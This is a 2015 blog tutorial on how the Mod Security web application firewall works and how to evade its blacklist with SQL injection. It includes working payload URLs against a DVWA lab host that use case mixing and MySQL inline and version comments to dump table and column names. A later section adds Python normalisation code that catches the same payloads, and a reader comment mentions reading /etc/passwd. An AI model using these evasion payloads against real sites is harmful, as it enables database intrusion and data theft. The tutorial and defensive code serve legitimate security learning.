Saturday, 25 July 2015

How to Bypass Mod Security WAF | Rahul Tyagi

Introduction to Web Application Firewall and IDS and IPS
-------------------------------------------------------
Web Application Firewall: when a website owner deploys a piece of software that carries a database of known attack patterns and uses it to filter the requests sent by visitors, the software deployed in front of the website is called a web application firewall.

Types of WAF
------------
Software WAF: these are firewall products that are installed on the web server itself, like any other software application, and filter the requested content from there.

Linux   : Mod Security  : Free | Paid : .php
Windows : Dot Defender  : Paid        : .asp, .aspx

Mod Security: Mod Security came into the picture in early 2008, when hackers were at their peak and defacing websites all over the world. It was an era with many paid firewalls but no solution for mid-sized organizations.

Mod Security arrived and gave website owners some hope that it would protect their websites from hackers.

Problems
--------
1. Attack database was limited.
2. Open source but lack of funding.

Based on the OWASP Top 10 attack categories, an open call was made to the hacker community, which built a large database of known attacks against web applications.

How to Install Mod Security on Ubuntu
--------------------------------------
$ sudo apt-get install libapache2-mod-security
$ sudo a2enmod mod-security
$ sudo /etc/init.d/apache2 force-reload

Understanding the working of WAF
--------------------------------
Every WAF works on one of two basic principles: white list filtration (only requests that match known-good patterns are allowed through) and black list filtration.

Black List: this is the second way of securing the website. The WAF keeps a database of known attack strings, especially SQL fragments such as (order by), (union all select) and so on. Any request from a VISITOR that carries one of these strings is matched against the list, and the request is blocked if a match is found.

How to Configure Your Mod Security in Ubuntu After Installation
----------------------------------------------------------------
sudo gedit /etc/apache2/sites-available/000-default.conf

After opening this file (000-default.conf), change the IP address of the server or the name of the website whose traffic we want Mod Security to filter.


Bypassing WAF Validations and Filtration
------------------------------------------

1. Upper/Lower Case Method

union all select : UnIoN aLl SeLeCt
http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' UnIoN SeLeCt 1,2--+&Submit=Submit#

Inline Comments : /*     */

2. Inline Executable Comments
/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/

Step 1: Get the tables from the database
http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1' /*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/ 1,2--+&Submit=Submit#


Target table: users

Step 2: Get the columns
http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1' /*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/ 1,column_name from information_schema.columns where table_name='users'--+&Submit=Submit#

Version Based Inline Executable Comments
----------------------------------------
MySQL
5.00.00 --> 50000
4.00.00 --> 40000
3.00.00 --> 30000
2.00.00 --> 20000
1.00.00 --> 10000

MySQL executes the body of a /*!NNNNN ... */ comment only when the server version is at or above the version number NNNNN; to any other parser it is just a comment.

/*!50000UnIoN*/ + /*!50000aLl*/+/*!50000SeLeCt*/

Step 3: http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1' /*!50000UnIoN*/+/*!50000aLl*/+/*!50000SeLeCt*/ 1,column_name from information_schema.columns where table_name='users'--+&Submit=Submit#

Note: Apply the same transformation to every query keyword and proceed with the attack.
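The three evasions above (case variation, inline comments and version-conditional inline comments) all work against a blacklist that compares the raw parameter value with its signatures. From the defender's side the fix is to normalise the input the way the database will interpret it before matching. The following is an added example, not code from the original post or from the Mod Security project: it takes constructed id= parameter values modelled on the post's own payloads, shows that a naive signature check misses them, and then applies a normaliser (URL decoding, keeping the body of MySQL /*! ... */ executable comments, dropping ordinary comments, case folding and whitespace compression) so that the same signatures match. The signature list and helper names are assumptions for illustration.

```python
import re
from typing import Dict, Tuple
from urllib.parse import unquote_plus

# Constructed sample values of the DVWA "id" parameter, modelled on the
# query strings shown in the post (the post's host and path are omitted).
SAMPLE_PARAMS = {
    "plain":   "1' union all select 1,2-- ",
    "case":    "1' UnIoN SeLeCt 1,2--+",
    "inline":  "1' /*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/ 1,2--+",
    "version": "1' /*!50000UnIoN*/+/*!50000aLl*/+/*!50000SeLeCt*/ 1,"
               "column_name from information_schema.columns where table_name='users'--+",
    "benign":  "42",
}

# A small, assumed blacklist of the kind the post describes (string based).
NAIVE_SIGNATURES = ("union all select", "union select", "order by")

# MySQL executes the body of /*! ... */ and /*!50000 ... */ comments.
_MYSQL_EXEC_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
# Ordinary /* ... */ comments are ignored by MySQL; attackers use them as separators.
_MYSQL_PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def naive_blacklist_match(value: str) -> bool:
    """Raw, case-sensitive substring match: what a naive blacklist does."""
    return any(sig in value for sig in NAIVE_SIGNATURES)


def normalize(value: str) -> str:
    """Rewrite the value into the form the database engine will actually see."""
    # 1. URL-decode; '+' becomes a space exactly as the web server decodes it
    v = unquote_plus(value)
    # 2. keep the body of executable comments, since MySQL will run it
    v = _MYSQL_EXEC_COMMENT.sub(r" \1 ", v)
    # 3. drop ordinary comments, replacing each with a single space
    v = _MYSQL_PLAIN_COMMENT.sub(" ", v)
    # 4. case folding and whitespace compression
    v = v.lower()
    v = re.sub(r"\s+", " ", v).strip()
    return v


def normalized_blacklist_match(value: str) -> bool:
    """The same signatures, applied after normalisation."""
    return naive_blacklist_match(normalize(value))


def classify(params: Dict[str, str]) -> Dict[str, Tuple[bool, bool]]:
    """Return, per sample, (naive match, normalised match)."""
    return {name: (naive_blacklist_match(v), normalized_blacklist_match(v))
            for name, v in params.items()}


if __name__ == "__main__":
    for name, (naive, normed) in classify(SAMPLE_PARAMS).items():
        print(f"{name:8s} naive={naive!s:5s} normalised={normed!s:5s} -> {normalize(SAMPLE_PARAMS[name])}")
```

Running the block shows that only the "plain" payload trips the naive check, while all four attack payloads trip the normalised one and the benign value trips neither. Production rule engines do the same job with transformation pipelines (Mod Security, for instance, applies transformations such as lowercasing, URL decoding and comment removal to an argument before the rule's pattern is evaluated), so a rule that inspects a raw argument without such transformations is exactly the kind of rule the post's payloads slip past.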


1 comment:

Unknown said...

What about PHP code, such as php info or /etc/passwd?
